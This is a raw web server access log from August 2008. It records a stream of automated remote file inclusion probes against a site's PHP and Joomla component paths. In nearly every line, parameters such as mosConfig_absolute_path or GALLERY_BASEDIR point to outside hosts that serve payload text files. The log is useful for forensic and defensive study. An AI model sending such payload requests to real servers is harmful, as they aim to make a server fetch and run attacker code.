67.205.111.117 - - [31/Aug/2008:20:56:42 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:20:56:43 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.805" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:20:58:50 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:20:58:51 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
217.147.236.10 - - [31/Aug/2008:20:58:52 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:59:05 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:59:05 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
12.192.82.221 - - [31/Aug/2008:20:59:05 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:21:00:26 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:21:00:26 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:21:00:26 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:01:08 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:01:08 -0700] "GET /phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:01:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:21:02:53 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.tribalsurf.com"
202.47.247.140 - - [31/Aug/2008:21:02:54 -0700] "GET /phphtml.php?htmlclass_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:21:03:27 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:21:03:27 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 1331 "-" "libwww-perl/5.808" "www.tribalsurf.com"
80.67.19.103 - - [31/Aug/2008:21:03:27 -0700] "GET /logs//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.808" "www.tribalsurf.com"
65.55.209.144 - - [31/Aug/2008:21:03:43 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:21:03:58 -0700] "GET /logs/access_080714.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:21:03:58 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
74.53.98.146 - - [31/Aug/2008:21:03:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:04:01 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:04:01 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:04:02 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:21:04:15 -0700] "GET //component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:21:04:15 -0700] "GET /logs//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:21:04:16 -0700] "GET /logs/access.log//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:21:07:33 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:21:07:33 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
207.249.0.39 - - [31/Aug/2008:21:07:33 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:08:53 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:08:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
77.222.40.169 - - [31/Aug/2008:21:08:54 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
89.248.110.152 - - [31/Aug/2008:21:09:32 -0700] "GET /logs/access.log%20//component/option,com_custompages/Itemid,157//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:21:10:44 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:21:10:45 -0700] "GET //include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
89.218.85.18 - - [31/Aug/2008:21:10:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:21:11:02 -0700] "GET /logs/homepage.php?sel=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:21:11:07 -0700] "GET /logs/access_080714.log/homepage.php?sel=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
200.25.180.198 - - [31/Aug/2008:21:11:07 -0700] "GET /homepage.php?sel=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:18:36 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:18:36 -0700] "GET /phphtml.php?htmlclass_path=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
85.13.230.130 - - [31/Aug/2008:21:18:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:21:19:14 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:21:19:14 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
193.207.106.54 - - [31/Aug/2008:21:19:14 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:21:20:25 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:21:20:25 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
67.205.111.117 - - [31/Aug/2008:21:20:25 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "tribalsurf.com"
64.202.116.5 - - [31/Aug/2008:21:20:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "tribalsurf.com"
80.74.146.175 - - [31/Aug/2008:21:21:07 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.tribalsurf.com"
201.130.79.38 - - [31/Aug/2008:21:21:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:24:07 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:24:07 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 1331 "-" "libwww-perl/5.812" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:24:07 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 200 1372 "-" "libwww-perl/5.812" "www.tribalsurf.com"
72.233.63.178 - - [31/Aug/2008:21:24:20 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.233.63.178 - - [31/Aug/2008:21:24:20 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.233.63.178 - - [31/Aug/2008:21:24:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:27:38 -0700] "GET /logs/access.log/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:27:39 -0700] "GET /home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
58.69.172.67 - - [31/Aug/2008:21:27:41 -0700] "GET /logs/home.php?index=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:33:48 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:00 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:09 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:09 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:09 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:10 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:10 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:34:10 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:34:59 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:34:59 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:00 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:05 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:06 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:07 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:20 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:21 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:35:21 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
74.53.231.2 - - [31/Aug/2008:21:35:53 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:05 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:05 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:06 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:06 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:06 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:06 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:19 -0700] "GET /logs/access.log/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:19 -0700] "GET /homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
216.246.28.43 - - [31/Aug/2008:21:36:20 -0700] "GET /logs/homepage.php?sel=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "tribalsurf.com"
218.38.54.160 - - [31/Aug/2008:21:37:24 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
218.38.54.160 - - [31/Aug/2008:21:37:25 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
218.38.54.160 - - [31/Aug/2008:21:37:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
218.38.54.160 - - [31/Aug/2008:21:38:14 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:48 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:48 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:50 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:59 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:41:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:42:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:42:03 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:42:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:42:42 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:42:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
63.208.74.34 - - [31/Aug/2008:21:42:42 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.tribalsurf.com"
89.108.66.188 - - [31/Aug/2008:21:42:42 -0700] "GET /logs/access_080714.log/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:01 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
72.9.233.10 - - [31/Aug/2008:21:43:06 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.tribalsurf.com"
